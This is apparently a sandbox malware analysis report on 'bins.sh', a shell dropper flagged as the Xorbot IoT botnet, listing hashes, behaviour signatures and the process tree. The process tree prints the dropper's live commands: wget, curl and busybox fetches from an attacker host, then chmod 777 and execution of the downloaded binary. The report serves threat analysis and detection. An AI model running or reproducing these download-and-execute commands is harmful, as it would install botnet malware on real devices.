Overview

overview

10

Static

static

1

bins.sh

ubuntu-18.04-amd64

3

bins.sh

debian-9-armhf

10

bins.sh

debian-9-mips

10

bins.sh

debian-9-mipsel

10

Analysis

  • max time kernel
    150s
  • max time network
    154s
  • platform
    debian-9_mipsel
  • resource
    debian9-mipsel-20240226-en
  • resource tags

    arch:mipselimage:debian9-mipsel-20240226-enkernel:4.9.0-13-4kc-maltalocale:en-usos:debian-9-mipselsystem
  • submitted
    29-11-2024 15:42

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    bins.sh

  • Size

    10KB

  • MD5

    b91e106ff02c3a44407db7510d190b3b

  • SHA1

    9881a6a9fffaeec6083184f37ab1364b6e4024e8

  • SHA256

    f609f5bfc7e3d5210e05714eb89a2d41b6fbe6c724e36c95db6113c75ebaf1b0

  • SHA512

    00aa727b0d4cb91c07fe7b94185a2d0bfee9bceceedd9e7d1d5a21a78659aad3e2181ec672bd5edaa9c10361a66045b7b62a5a8500c0d8e6a06f447907f38c6f

  • SSDEEP

    96:Yswl6Lvcnvc7vcecRcpch3LiQ3auL5RHELFlRKCVSqzLcgZLm3GMDfZrHZhLsGTq:26QkARaSVPLEvhcBXbBtkARaSC

Score
10/10
xorbotbotnetdefense_evasiondiscoverytrojan

Malware Config

Signatures

  • Detects Xorbot 1 IoCs
    botnettrojan
  • Xorbot

    Xorbot is a linux botnet and trojan targeting IoT devices.

    botnettrojanxorbot
  • Xorbot family
    xorbot
  • File and Directory Permissions Modification 1 TTPs 1 IoCs

    Adversaries may modify file or directory permissions to evade defenses.

    defense_evasion
  • Executes dropped EXE 1 IoCs
  • Reads runtime system information 1 IoCs

    Reads data from /proc virtual filesystem.

    discovery
  • System Network Configuration Discovery 1 TTPs 4 IoCs

    Adversaries may gather information about the network configuration of a system.

    discovery
  • Writes file to tmp directory 4 IoCs

    Malware often drops required files in the /tmp directory.

Processes

  • /tmp/bins.sh
    /tmp/bins.sh
    1⤵
      PID:702
      • /bin/rm
        /bin/rm bins.sh
        2⤵
          PID:707
        • /usr/bin/wget
          wget http://conn.masjesu.zip/bins/HBTC3hZ9EANvRzlR7CWnfxfwOusb5o6vWH
          2⤵
          • System Network Configuration Discovery
          • Writes file to tmp directory
          PID:709
        • /usr/bin/curl
          curl -O http://conn.masjesu.zip/bins/HBTC3hZ9EANvRzlR7CWnfxfwOusb5o6vWH
          2⤵
          • Reads runtime system information
          • System Network Configuration Discovery
          • Writes file to tmp directory
          PID:731
        • /bin/busybox
          /bin/busybox wget http://conn.masjesu.zip/bins/HBTC3hZ9EANvRzlR7CWnfxfwOusb5o6vWH
          2⤵
          • System Network Configuration Discovery
          • Writes file to tmp directory
          PID:733
        • /bin/chmod
          chmod 777 HBTC3hZ9EANvRzlR7CWnfxfwOusb5o6vWH
          2⤵
          • File and Directory Permissions Modification
          PID:734
        • /tmp/HBTC3hZ9EANvRzlR7CWnfxfwOusb5o6vWH
          ./HBTC3hZ9EANvRzlR7CWnfxfwOusb5o6vWH
          2⤵
          • Executes dropped EXE
          PID:735
        • /bin/rm
          rm HBTC3hZ9EANvRzlR7CWnfxfwOusb5o6vWH
          2⤵
            PID:737
          • /usr/bin/wget
            wget http://conn.masjesu.zip/bins/8YM3ib0RyGWgg6nrmydXaBhxwvhDsrrpJm
            2⤵
            • System Network Configuration Discovery
            • Writes file to tmp directory
            PID:738

        Network

        MITRE ATT&CK Enterprise v15

        Replay Monitor

        Loading Replay Monitor...

        Downloads

        • /tmp/HBTC3hZ9EANvRzlR7CWnfxfwOusb5o6vWH
          Filesize

          141KB

          MD5

          3ca8decdb1e52c423c521bfff02ac200

          SHA1

          8621ecd6807109b8541912ad9e134f6fb49bfd48

          SHA256

          dee3a1252e88f188c362e08b16ece678559ad2566511871f5cde69296f6c779f

          SHA512

          b6f89d7875d584c109f30814738fec4fe04619745941d9cbbff20bbefbab454dee7180321f6913da1a3b89fba2dc743b28631e52261539d091cc802a5c7a1c7a

          Download Submit